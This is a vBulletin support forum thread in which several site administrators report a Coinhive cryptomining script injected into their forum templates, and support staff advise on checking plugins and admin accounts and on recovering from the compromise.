Discovered coin mining script coinhive injected in template

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Zackw
    Senior Member
    • Aug 2010
    • 150
    • 4.0.x

    [Forum] Discovered coin mining script coinhive injected in template

    Hello,
    I'm on VB 4.2.3 PL 1.
    Only plugins I have a Bluepearl, social page icons, disable lockout notification emails, glowhost, and tapatalk.


    Somehow someone injected a script into the footer template. I won't post the full script unless anybody is curious, but just know it goes to coinhive.com, pulls the script coinhive.min.js, and that the coinhive user is "XRp4BmFx9n8gReuyEvoeDIVlIFS4DfQq".

    It should be noted that coinhive itself, as well as this script, may be perfectly valid technology someone may choose to install on their own website and give users an option to allow it or not as an alternate income to using ads.
    But of course, in my case, I don't want it, it was injected into VB, and I removed it.

    That said, we discovered it on November 13th, it was probably installed this day, or maybe day before. Users started getting their security tools blocking our forum.

    I would like additional information about how the hell these things get injected into our templates in the first place. When I run the system file checker tool, it didn't see any files out of the ordinary.
    I have to assume this was not done via an admin user or through the control panel, it was more likely some vulnerability in the forum itself, through API or I don't know what, there is no backtrace for the template change (unless there is??).

    What can I do further to guard against these freaking tools from putting code into my site at will? The script injected itself into a very specific place in the footer template. Not just appended to the top or bottom but went directly after the copyright notice. How is this possible?

    Everybody on VB4 should scan often for coinhive.
  • Mark.B
    vBulletin Support
    • Feb 2004
    • 24286
    • 6.0.X

    #2
    The first thing you should be looking for is unexpected plugins. Look in the plug in section, particularly under the 'vBulletin' product. Is there anything there you don't recognise?
    Look under usergroups and show all primary users for the administrators group. Anybody there you don't recognise? Delete them if so.

    4.2.3 has a PL2 so you should be running that at the very least. Ideally upgrade to 4.2.5, this though requires php 5.6 as a minimum so watch out for that.

    It's possible though that they got in via the server. Your hosts can help with that.

    We have an article for recovering and securing hacked sites:
    This guide is for what to do, after you’ve been hacked, exploited, and or defaced. Step 1, Change everything: If you believe, or think your site has
    MARK.B
    vBulletin Support
    ------------
    My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
    My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

    Comment

    • Zackw
      Senior Member
      • Aug 2010
      • 150
      • 4.0.x

      #3
      Hi Mark
      Thanks.

      Plugins appear to be fine, nothing seems odd. And note that the entire blog and CMS part are turned off, so all those are crossed out.
      All the rest of the plugins are from Tapatalk, GlowHost, and disable lockout emails.

      I only have 4 admins, I'm going to have us all do password resets.


      What do you mean by getting in through the server? Just like a direct mysql connection or FTP? What other way could there be?

      What if they did it via access to some php script somewhere? Do you guys have a tool that can look for correct file/folder permissions or scan for php files where they shouldn't be?

      cheers

      Comment

      • bevans84
        New Member
        • Jun 2004
        • 9

        #4
        Same thing happened to me. VB 4.2.5.
        Script was placed in ad_footer_start
        I'm the only admin for both the server and the VB installation.







        Comment

        • Mark.B
          vBulletin Support
          • Feb 2004
          • 24286
          • 6.0.X

          #5
          You should go through ALL the steps in the article linked to previously.

          The fact you're the only admin on the server doesn't preclude others gaining access, that's the whole point.
          MARK.B
          vBulletin Support
          ------------
          My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
          My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

          Comment

          • bevans84
            New Member
            • Jun 2004
            • 9

            #6
            I fixed mine a week ago,
            A simple google search indicates that we're not the only two. Just sayin'

            Comment

            • Mark.B
              vBulletin Support
              • Feb 2004
              • 24286
              • 6.0.X

              #7
              Originally posted by bevans84
              I fixed mine a week ago,
              A simple google search indicates that we're not the only two. Just sayin'
              The filestore hack has been around for years. It is not due to any exploit in vBulletin though, if that's what you're driving at.

              Most, but not all, victims have run vBSEO at some point. vBSEO is a third party product that hasn't been obsolete for many years and should not be used on any site.

              Those not running vBSEO generally have insecure plugins running.
              MARK.B
              vBulletin Support
              ------------
              My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
              My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

              Comment

              • amfor
                New Member
                • Aug 2012
                • 3
                • 3.8.x

                #8
                The same problem has happened to me today. I use vbulletin v 3.8.11. Members of forum informed me that forum infected by coinhive. I found the code in the header template and removed it. But I do not understand how they are installed it.

                Do somebody found the backdoor in vbulletin or in the modules? I has VBSEO module, but this module was disabled. Now I removed it completely.

                Do somebody have any other ideas how they install infected code to the templates?

                Comment

                • Mark.B
                  vBulletin Support
                  • Feb 2004
                  • 24286
                  • 6.0.X

                  #9
                  Originally posted by amfor
                  The same problem has happened to me today. I use vbulletin v 3.8.11. Members of forum informed me that forum infected by coinhive. I found the code in the header template and removed it. But I do not understand how they are installed it.

                  Do somebody found the backdoor in vbulletin or in the modules? I has VBSEO module, but this module was disabled. Now I removed it completely.

                  Do somebody have any other ideas how they install infected code to the templates?
                  vBSEO is almost certainly how they got in. Could have opened a backdoor while it was still there, or parts of the code could still be present.
                  MARK.B
                  vBulletin Support
                  ------------
                  My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
                  My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

                  Comment

                  • Dreslough
                    New Member
                    • Aug 2006
                    • 4
                    • 3.6.x

                    #10
                    Greetings! Thank you for posting this! We're running 4.2.4 and I just discovered the same problem. I've been ripping apart my computer all day, assuming I was dealing with a serious hardware or software problem -- until I realized that I had a tab open to our company's forum, and when I closed the vBulletin tab, my computer started working normally again (and the CPU usage dropped from 99% to 2%).

                    Alas, I'm a vBulletin novice. My forum (http://mogulforums.com/) is supplementary to my business, so I've never had the time to develop any expertise with it. I'm staring at the Admin CP right now, and I have no idea how to "scan often for coinhive". So I'm still infected. Could someone please lead me through the steps to find and remove the offending code? (e.g. exactly what do I click on the Admin CP menu etc.)

                    Thanks!

                    Also, I have never added any plug-ins or modules, and there are no plug-ins listed in the CP. And I've never heard of vBSEO. It's highly unlikely that a hacker figured out my password, but is there a way to verify this? For example, can I see a log of times my account was accessed and compare it to the [very few] times that I am actually logged in?
                    Sports and sports game discussion forum

                    Comment

                    • Dreslough
                      New Member
                      • Aug 2006
                      • 4
                      • 3.6.x

                      #11
                      FYI, screen shot of my "plug-ins" page, so you can confirm that I'm actually looking at the right page.

                      I also write software, so I know that problems often come down to "user error". I don't mind being called an idiot if you also help me fix this. Thanks!

                      Comment

                      • Trevor Hannant
                        vBulletin Support
                        • Aug 2002
                        • 24325
                        • 5.7.X

                        #12
                        That's the Product page, not the Plugin page - go to:

                        AdminCP > Plugins & Products > Plugin Manager
                        Vote for:

                        - Admin Settable Paid Subscription Reminder Timeframe (vB6)
                        - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)

                        Comment

                        widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                        Working...